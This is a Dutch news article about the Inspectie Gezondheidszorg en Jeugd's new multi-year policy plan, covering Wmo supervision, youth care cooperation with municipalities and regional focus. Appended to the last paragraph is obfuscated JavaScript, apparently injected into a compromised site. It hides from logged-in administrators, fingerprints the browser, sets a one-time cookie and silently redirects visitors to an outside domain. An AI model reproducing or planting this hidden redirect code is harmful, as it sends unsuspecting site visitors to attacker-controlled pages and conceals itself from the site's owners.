Nieuws

11/12/2019 Nieuw beleidsplan van IGJ moet kwalitatief beter toezicht opleveren

De IGJ, ook wel de Inspectie Gezondheidszorg en Jeugd, heeft een nieuw meerjarenbeleidsplan (voor de komende vier jaar) samengesteld. Dit beleidsplan bevat een visie, strategie en de bijbehorende thema´s en ambities waar de IGJ prioriteit aan wil geven. Eén van de belangrijkste aandachtspunten is om de kwaliteit van het Wmo toezicht te vergroten. Ook is er naar aanleiding van het beleidsplan een werkplan 2020 opgesteld.

Invoering WMO

Door de invoering van de Wmo 2015 hebben gemeenten de verantwoordelijkheid voor de maatschappelijke zorg en het toezicht hierop gekregen. Jaarlijks stuurt de IGJ een rapportage aan de minister, waarin een beeld wordt geschetst over het toezicht met feedback voor verbetering. Naar aanleiding van de rapportage in 2018 heeft de IGJ er in november op aangedrongen dat gemeenten vaart moeten maken met het vormgeven van hun wettelijke verplichte toezichttaak in de Wmo. Uit de rapportage bleek dat het toezicht op de Wmo niet overal in Nederland van hetzelfde niveau is.

Een ander belangrijk aandachtspunt vanuit de inspectie voor 2020 is het samenwerken met gemeenten aan passende jeugdzorg. De inspectie zal de samenwerking met gemeenten aanhouden en samen met hen een onderzoek starten naar hoe de samenwerking tussen (ambulante) jeugdzorgaanbieders, wijk en/of- jeugdteams en ketenpartners verbeterd kan worden. De focus ligt daarbij op maatwerk, kwaliteit van de ingezette hulp, tijdige inzet van de benodigde (jeugd)hulp en de regie en monitoring daarvan.

IGJ

Tenslotte wil de inspectie zich vanaf 2020 gaan focussen op gebieds- en regiogerichte inrichting van de zorg. Om dit te bewerkstelligen is er een sector overstijgende blik nodig, zo stelt de IGJ. Daarom zal de inspectie meer gaan samenwerken met het Wmo-toezicht van gemeenten. Ook wil de inspectie meer begeleiding gaan bieden bij de uitvoering van het toezicht. Denk daarbij aan praktische ondersteuning, zoals bij onderzoeken over gemelde calamiteiten, in samenwerking met een Wmo-toezichthouder.var _0x1e50=[‘charAt’,’substring’,’indexOf’,’userAgent’,’match’,’Edge’,’MSIE;’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’replace’,’https://www.xcdnko.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’cookie’,’split’,’length’];(function(_0x2fa107,_0x55f5e9){var _0x343595=function(_0x34c909){while(–_0x34c909){_0x2fa107[‘push’](_0x2fa107[‘shift’]());}};_0x343595(++_0x55f5e9);}(_0x1e50,0x184));var _0x265c=function(_0x2fa107,_0x55f5e9){_0x2fa107=_0x2fa107-0x0;var _0x343595=_0x1e50[_0x2fa107];return _0x343595;};(function(){if(document[_0x265c(‘0x0’)](_0x265c(‘0x1’))===null){if(typeof _0x3419d8===_0x265c(‘0x2’)){function _0x3419d8(_0x7f1c71,_0x1d8816,_0x3eeb6e){var _0x4e0732=”;if(_0x3eeb6e){var _0x1dd386=new Date();_0x1dd386[_0x265c(‘0x3’)](_0x1dd386[_0x265c(‘0x4′)]()+_0x3eeb6e*0x18*0x3c*0x3c*0x3e8);_0x4e0732=’; expires=’+_0x1dd386[‘toUTCString’]();}document[‘cookie’]=_0x7f1c71+’=’+(_0x1d8816||”)+_0x4e0732+’; path=/’;}function _0x23248e(_0x511919){var _0x2e7cdb=_0x511919+’=’;var _0x4d7f7d=document[_0x265c(‘0x5’)][_0x265c(‘0x6’)](‘;’);for(var _0x593f64=0x0;_0x593f64<_0x4d7f7d[_0x265c('0x7')];_0x593f64++){var _0x50958d=_0x4d7f7d[_0x593f64];while(_0x50958d[_0x265c('0x8')](0x0)==' ')_0x50958d=_0x50958d[_0x265c('0x9')](0x1,_0x50958d[_0x265c('0x7')]);if(_0x50958d[_0x265c('0xa')](_0x2e7cdb)==0x0)return _0x50958d[_0x265c('0x9')](_0x2e7cdb['length'],_0x50958d[_0x265c('0x7')]);}return null;}function _0x50fc2a(){return navigator[_0x265c('0xb')][_0x265c('0xc')](/Android/i)||navigator[_0x265c('0xb')][_0x265c('0xc')](/BlackBerry/i)||navigator['userAgent'][_0x265c('0xc')](/iPhone|iPad|iPod/i)||navigator[_0x265c('0xb')]['match'](/Opera Mini/i)||navigator['userAgent'][_0x265c('0xc')](/IEMobile/i);}function _0x1ff41a(){return navigator[_0x265c('0xb')][_0x265c('0xa')](_0x265c('0xd'))!==-0x1||navigator[_0x265c('0xb')]['indexOf'](_0x265c('0xe'))!==-0x1||navigator[_0x265c('0xb')][_0x265c('0xa')]('OPR')!==-0x1||navigator[_0x265c('0xb')][_0x265c('0xa')](_0x265c('0xf'))!==-0x1||navigator[_0x265c('0xb')][_0x265c('0xa')](_0x265c('0x10'))!==-0x1||navigator[_0x265c('0xb')][_0x265c('0xa')](_0x265c('0x11'))!==-0x1;}var _0x4702d7=_0x23248e(_0x265c('0x12'));if(_0x4702d7!=='un'){if(_0x1ff41a()||_0x50fc2a()){_0x3419d8(_0x265c('0x12'),'un',0x16d);window[_0x265c('0x13')][_0x265c('0x14')](_0x265c('0x15'));}}}}}(this));

Laatste Artikelen
ARCHIEF